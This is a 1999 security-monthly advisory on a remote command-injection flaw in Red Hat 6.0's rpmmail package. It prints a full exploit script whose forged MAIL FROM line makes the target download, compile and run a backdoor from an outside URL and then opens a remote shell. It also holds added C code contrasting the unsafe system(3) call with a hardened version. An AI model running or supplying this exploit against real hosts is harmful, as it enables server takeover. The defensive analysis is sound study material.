NSFOCUS Security Monthly -> Issue 4 -> Latest Vulnerabilities
Date: 1999-12-14
Smail-3.2 (rpmmail) remote command execution vulnerability
Vulnerability type: remote, local
Published: 1999-10-20
Updated: 1999-11-29
Affected systems:
Red Hat 6.0
Description:
The Smail-3.2 (rpmmail) package shipped on the Red Hat 6.0 Extra Applications CD lets a remote or local attacker run arbitrary commands. The rpmmail binary (/home/rpmmail/rpmmail, set-uid root by default and invoked from the rpmmail user's .forward) passes the sender address of an incoming mail to system(3). Whether the injected command runs as root depends on the /bin/sh in use: where /bin/sh is bash 2, which drops set-uid privileges on startup, the attacker gets command execution as an unprivileged user such as "nobody"; where /bin/sh does not drop privileges, the result is root.
Proof of concept:
#!/bin/sh
# remote root exploit for Smail-3.2 (rpmmail) by ben-z [bentothez@phayze.com]
# greets to:
# all of gH, "Brock Tellier" for discovering the hole.
# special greets to:
# icesk, mosthated, elux, rhodie, and the rest of #bifemlinux @ undernet
# ---- Brock Tellier's original advisory
# Greetings,
#
# A vulnerability exists in the rpmmail package distributed on the Red Hat 6.0
# Extra Applications CD. The potential compromise for this bug could be remote
# or local root or simply remote command execution as "nobody" or similar,
# depending on your system configuration.
#
# By sending a carefully crafted mail message to rpmmail@vulnerablehost, you can
# get /home/rpmmail/rpmmail (suid root by default, exec'd by .forward remotely)
# to system(3) any command you wish. The command executed does not necessarily
# have root privs because of bash's handling of euid != uid of caller. Although
# system(3) calls /bin/sh -c, it is linked by default (can anyone verify
# these?) on some Linux systems, such as SuSE 6.2, to /bin/bash v2. From the
# system(3) man page:
#
# system() will not, in fact, work properly from programs
# with suid or sgid privileges on systems on which
# /bin/sh is bash version 2, since bash 2 drops privileges
# on startup. (Debian uses a modified bash which does not
# do this when invoked as sh.)
#
# Thus some systems with rpmmail installed are vulnerable to local/remote root,
# all others to remote command execution as an unpriv'd user.
# --- end Brock's text
# you need to have backdoor source somewhere out on the net;
# the payload makes the target fetch it with lynx, compile it and run it
BACKDOOR="http://meltingpot.fortunecity.com/rundberg/521/blackhole.c"
if [ -z "$1" ]; then
echo "usage: $0 <host>"
exit 1
fi
if [ -z "$(which nc)" ]; then
echo "this script requires netcat [nc]"
exit 1
fi
rmt=$(host "$1" | grep -i "$1" | grep -i "has address" | awk '{print $4}')
if [ -z "$rmt" ]; then
echo "unable to obtain address for $1"
exit 1
fi
echo "= remote exploit for Smail-3.2 (rpmmail) by ben-z [bentothez@phayze.com] ="
# EXPN on the rpmmail alias returns its .forward pipe ("|/home/rpmmail/rpmmail -c")
# when the package is installed and the MTA answers EXPN
echo -n "[**]: Making sure the system is vulnerable.. "
(sleep 1; echo "EXPN rpmmail"; sleep 1) | nc -w 4 "$1" 25 >vuln.tmp 2>&1
if ! grep "250" vuln.tmp | grep -q "rpmmail -c"; then
echo "no!"
rm -f vuln.tmp
exit 1
fi
echo "yes!"
# the envelope sender is what rpmmail hands to system(3); the ';' turns the
# rest of it into shell commands (\x20 in place of spaces, which the envelope
# address cannot carry)
echo -n "[**]: Setting up our tcp bound shell.. "
(sleep 1; echo "MAIL FROM: ;lynx\x20-dump\x20$BACKDOOR\x201>unf.c\x202>unf.c\x20;gcc\x20-o\x20unf\x20unf.c\x20;./unf\x20&;";
sleep 1; echo "RCPT TO: rpmmail";
sleep 1; echo "DATA";
sleep 1; echo "unf"; echo ".";
sleep 2; echo "quit") | nc -w 4 "$1" 25 >vuln.tmp 2>&1
if ! grep -qi " 250 Mail accepted" vuln.tmp; then
echo "failed!"
rm -f vuln.tmp
exit 1
fi
echo "success!"
# blackhole.c is expected to be listening on tcp/5300 by now
echo -n "[**]: Attempting to obtain access.. "
nc -w 3 "$1" 5300
echo "done."
echo -n "[**]: Cleaning up local mess.. "
rm -f vuln.tmp
killall -9 nc >/dev/null 2>&1
echo "done."
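The advisory and the exploit above turn on two things: rpmmail interpolates the envelope sender into a string handed to system(3), and whether that string runs as root hinges on what the system's /bin/sh does with set-uid bits. The following C program is an added example, not rpmmail's code and not part of the original advisory or exploit. It shows the vulnerable shape of such a reply path beside a hardened version that validates the address, builds an argv vector so no shell ever parses it, and drops the set-uid identity itself before exec, plus the EXPN check the exploit keys on. The "/bin/mail -s ..." command format, the mailer path /bin/true, the example.invalid URL in the constructed payload and the sample EXPN reply line are all assumptions made for the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constructed payload in the shape the exploit script sends as the SMTP
 * envelope sender (MAIL FROM). The backdoor URL is a placeholder. */
static const char *INJECTED_SENDER =
    ";lynx\\x20-dump\\x20http://example.invalid/blackhole.c\\x201>unf.c\\x202>unf.c\\x20;"
    "gcc\\x20-o\\x20unf\\x20unf.c\\x20;./unf\\x20&;";

/* Vulnerable pattern (assumed shape of the rpmmail reply path, not its
 * source): the sender is interpolated into a command line destined for
 * system(3), so a ';' in it splits off further shell commands.
 * Returns 1 if the command fit in the buffer. */
int build_reply_command_unsafe(const char *sender, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "/bin/mail -s 'RPM request' %s", sender);
    return n > 0 && (size_t)n < outlen;
}

/* Conservative envelope-address check: exactly one '@', a non-empty local
 * part of [A-Za-z0-9._+=-], a domain of alnum/'.'/'-'. Every character a
 * shell could act on (';', '|', '&', '`', '$', space, quotes, backslash,
 * '<', '>') is rejected. Returns 1 if acceptable. */
int is_safe_address(const char *s)
{
    size_t len = strlen(s);
    const char *at = strchr(s, '@');
    const char *p;

    if (len == 0 || len > 254 || at == NULL || at == s || at[1] == '\0')
        return 0;
    if (strchr(at + 1, '@') != NULL)
        return 0;
    for (p = s; p < at; p++)
        if (!isalnum((unsigned char)*p) && strchr("._+=-", *p) == NULL)
            return 0;
    for (p = at + 1; *p != '\0'; p++)
        if (!isalnum((unsigned char)*p) && *p != '.' && *p != '-')
            return 0;
    return 1;
}

/* Hardened replacement: an argv vector instead of a command string, so the
 * address is one opaque argument and no shell parses it. Returns argc on
 * success, 0 if the address is rejected or the array is too small. */
int build_reply_argv(const char *mailer, const char *sender,
                     const char *argv[], int max_argv)
{
    if (!is_safe_address(sender) || max_argv < 5)
        return 0;
    argv[0] = mailer;
    argv[1] = "-s";
    argv[2] = "RPM request";
    argv[3] = sender;
    argv[4] = NULL;
    return 4;
}

/* Run the vector with fork+execv after giving up the set-uid identity in the
 * child. This is what system(3) leaves to the /bin/sh flavour: here the
 * privileges are dropped explicitly, whatever shell the mailer might spawn.
 * Returns the child's exit status, or -1 on failure. */
int run_without_shell(const char *const argv[])
{
    pid_t pid = fork();
    int status;

    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(126);
        execv(argv[0], (char *const *)argv);
        _exit(127);
    }
    if (waitpid(pid, &status, 0) != pid)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* The exploit's preflight: a 250 reply to "EXPN rpmmail" that echoes the
 * .forward pipe command is the signal it keys on. Returns 1 for that shape. */
int expn_reply_reveals_pipe(const char *reply)
{
    return strncmp(reply, "250", 3) == 0 && strstr(reply, "rpmmail -c") != NULL;
}

int main(void)
{
    char cmd[512];
    const char *argv[8];

    build_reply_command_unsafe(INJECTED_SENDER, cmd, sizeof cmd);
    printf("system(3) would see: %s\n", cmd);
    printf("injected sender passes check: %d\n", is_safe_address(INJECTED_SENDER));
    if (build_reply_argv("/bin/true", "user@example.com", argv, 8) > 0)
        printf("hardened path exit status: %d\n", run_without_shell(argv));
    printf("EXPN reveals pipe: %d\n",
           expn_reply_reveals_pipe("250 <\"|/home/rpmmail/rpmmail -c\">"));
    return 0;
}
```

Compile with cc -Wall and run: build_reply_command_unsafe passes the exploit's MAIL FROM string straight through to what system(3) would execute, while is_safe_address rejects it before any argv is built. The privilege drop in run_without_shell is the point the advisory leaves to chance: a set-uid program that calls system(3) is only as safe as the /bin/sh behind it.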
All rights reserved. Reproduction without permission is prohibited.